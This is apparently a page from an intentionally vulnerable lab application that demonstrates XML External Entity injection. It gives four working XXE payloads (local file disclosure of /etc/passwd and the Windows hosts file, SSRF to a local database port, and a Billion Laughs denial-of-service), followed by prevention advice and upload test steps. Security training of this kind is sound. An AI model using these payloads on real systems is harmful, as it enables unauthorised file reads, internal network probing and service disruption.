XXE (XML External Entity) Demo
XML External Entity (XXE) injection is a vulnerability that occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
What XXE Can Do:
- File Disclosure: Read local files from the server
- SSRF Attacks: Make requests to internal systems
- DoS Attacks: Consume server resources
- RCE: Remote code execution in some cases
Try These XXE Payloads:
Create XML files with these contents and upload them:
1. Basic File Disclosure (Windows):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<root>
<data>&xxe;</data>
</root>
2. Basic File Disclosure (Linux):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
3. SSRF via XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://localhost:3306/">
]>
<root>
<data>&xxe;</data>
</root>
4. Billion Laughs DoS Attack:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<lolz>&lol4;</lolz>
XXE Prevention Methods:
- Disable External Entities: Configure XML parser to disable external entity processing
- Input Validation: Validate and sanitize XML input
- Use Safe Parsers: Use XML parsers that are secure by default
- Whitelisting: Only allow specific XML structures
- Patch Libraries: Keep XML processing libraries updated
Test Steps:
- Copy one of the payloads above into a text file
- Save it with a
.xmlextension - Upload the file using the form below
- Observe the server response for sensitive information